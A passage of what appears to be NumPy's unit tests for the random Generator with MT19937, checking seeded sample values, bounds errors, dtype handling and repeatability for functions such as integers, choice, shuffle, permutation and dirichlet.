@pytest.mark.parametrize('method', ['count', 'marginals'])
@pytest.mark.parametrize('size', [5, (2, 3), 150000])
def test_typical_cases(self, nsample, method, size):
random = Generator(MT19937(self.seed))
colors = np.array([10, 5, 20, 25])
sample = random.multivariate_hypergeometric(colors, nsample, size,
method=method)
if isinstance(size, int):
expected_shape = (size,) + colors.shape
else:
expected_shape = size + colors.shape
assert_equal(sample.shape, expected_shape)
assert_((sample >= 0).all())
assert_((sample <= colors).all())
assert_array_equal(sample.sum(axis=-1),
np.full(size, fill_value=nsample, dtype=int))
if isinstance(size, int) and size >= 100000:
# This sample is large enough to compare its mean to
# the expected values.
assert_allclose(sample.mean(axis=0),
nsample * colors / colors.sum(),
rtol=1e-3, atol=0.005)
def test_repeatability1(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
method='count')
expected = np.array([[2, 1, 2],
[2, 1, 2],
[1, 1, 3],
[2, 0, 3],
[2, 1, 2]])
assert_array_equal(sample, expected)
def test_repeatability2(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 50,
size=5,
method='marginals')
expected = np.array([[ 9, 17, 24],
[ 7, 13, 30],
[ 9, 15, 26],
[ 9, 17, 24],
[12, 14, 24]])
assert_array_equal(sample, expected)
def test_repeatability3(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 12,
size=5,
method='marginals')
expected = np.array([[2, 3, 7],
[5, 3, 4],
[2, 5, 5],
[5, 3, 4],
[1, 5, 6]])
assert_array_equal(sample, expected)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (self.state['bit_generator'],
self.state['state']['key'],
self.state['state']['pos'])
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
class TestIntegers:
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, [0],
endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
'int16': '39624ead49ad67e37545744024d2648b',
'int32': '5c4810373f979336c6c0c999996e47a1',
'int64': 'ab126c15edff26f55c50d2b7e37391ac',
'int8': 'ba71ccaffeeeb9eeb1860f8075020b9c',
'uint16': '39624ead49ad67e37545744024d2648b',
'uint32': '5c4810373f979336c6c0c999996e47a1',
'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
'uint8': 'ba71ccaffeeeb9eeb1860f8075020b9c'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
@pytest.mark.parametrize(
'bound, expected',
[(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
3769704066, 1170797179, 4108474671])),
(2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
3769704067, 1170797180, 4108474672])),
(2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
1831631863, 1215661561, 3869512430]))]
)
def test_repeatability_32bit_boundary(self, bound, expected):
for size in [None, len(expected)]:
random = Generator(MT19937(1234))
x = random.integers(bound, size=size)
assert_equal(x, expected if size is not None else expected[0])
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[1622936284, 3620788691, 1659384060],
[1417365545, 760222891, 1909653332],
[3788118662, 660249498, 4092002593]],
[[3625610153, 2979601262, 3844162757],
[ 685800658, 120261497, 2694012896],
[1207779440, 1586594375, 3854335050]],
[[3004074748, 2310761796, 3012642217],
[2067714190, 2786677879, 1363865881],
[ 791663441, 1867303284, 2169727960]],
[[1939603804, 1250951100, 298950036],
[1040128489, 3791912209, 3317053765],
[3155528714, 61360675, 2305155588]],
[[ 817688762, 1335621943, 3288952434],
[1770890872, 1102951817, 1957607470],
[3099996017, 798043451, 48334215]]])
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345))
x = random.integers([[-1], [0], [1]],
[2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
low_o = np.array([[low]*10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
# chi2max is the maximum acceptable chi-squared value.
@pytest.mark.slow
@pytest.mark.parametrize('sample_size,high,dtype,chi2max',
[(5000000, 5, np.int8, 125.0), # p-value ~4.6e-25
(5000000, 7, np.uint8, 150.0), # p-value ~7.7e-30
(10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25
(50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25
])
def test_integers_small_dtype_chisquared(self, sample_size, high,
dtype, chi2max):
# Regression test for gh-14774.
samples = random.integers(high, size=sample_size, dtype=dtype)
values, counts = np.unique(samples, return_counts=True)
expected = sample_size / high
chi2 = ((counts - expected)**2 / expected).sum()
assert chi2 < chi2max
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_integers(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[-80, -56], [41, 37], [-83, -16]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random = Generator(MT19937(self.seed))
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_closed(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
assert_array_equal(actual, desired)
def test_integers_max_int(self):
# Tests whether integers with closed=True can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
endpoint=True)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.096999199829214, 0.707517457682192],
[0.084364834598269, 0.767731206553125],
[0.665069021359413, 0.715487190596693]])
assert_array_almost_equal(actual, desired, decimal=15)
random = Generator(MT19937(self.seed))
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.0969992 , 0.70751746],
[0.08436483, 0.76773121],
[0.66506902, 0.71548719]])
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random = Generator(MT19937(self.seed))
actual = random.random(dtype=np.float32)
desired = 0.0969992
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype='int32')
def test_choice_uniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4)
desired = np.array([0, 0, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([0, 1, 0, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False)
desired = np.array([2, 0, 3], dtype=np.int64)
assert_array_equal(actual, desired)
actual = random.choice(4, 4, replace=False, shuffle=False)
desired = np.arange(4, dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([0, 2, 3], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random = Generator(MT19937(self.seed))
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['a', 'a', 'c', 'c'])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[0, 1], [0, 1], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[0], [2], [4], [6]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random = Generator(MT19937(self.seed))
non_contig = random.choice(5, 3, p=p[::2])
random = Generator(MT19937(self.seed))
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
random = Generator(MT19937(self.seed))
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != 'little':
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert_(choice_hash == res)
def test_bytes(self):
random = Generator(MT19937(self.seed))
actual = random.bytes(10)
desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random = Generator(MT19937(self.seed))
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=1)
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=-1)
assert_array_equal(actual, desired)
def test_shuffle_axis_nonsquare(self):
y1 = np.arange(20).reshape(2, 10)
y2 = y1.copy()
random = Generator(MT19937(self.seed))
random.shuffle(y1, axis=1)
random = Generator(MT19937(self.seed))
random.shuffle(y2.T)
assert_array_equal(y1, y2)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_shuffle_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.shuffle, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.shuffle, arr, 3)
assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
arr = [[1, 2, 3], [4, 5, 6]]
assert_raises(NotImplementedError, random.shuffle, arr, 1)
def test_permutation(self):
random = Generator(MT19937(self.seed))
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
bad_x_str = "abcd"
assert_raises(np.AxisError, random.permutation, bad_x_str)
bad_x_float = 1.2
assert_raises(np.AxisError, random.permutation, bad_x_float)
random = Generator(MT19937(self.seed))
integer_val = 10
desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_permutation_custom_axis(self):
a = np.arange(16).reshape((4, 4))
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=1)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=-1)
assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[42, 41],
[42, 48],
[44, 50]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456)
desired = 42
assert_array_equal(actual, desired)
def test_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[32.9850547060149, 39.0219480493301],
[56.2006134779419, 57.3474165711485],
[55.4243733880198, 55.4209797925213]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.5439892869558927, 0.45601071304410745],
[0.5588917345860708, 0.4411082654139292 ]],
[[0.5632074165063435, 0.43679258349365657],
[0.54862581112627, 0.45137418887373015]],
[[0.49961831357047226, 0.5003816864295278 ],
[0.52374806183482, 0.47625193816517997]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
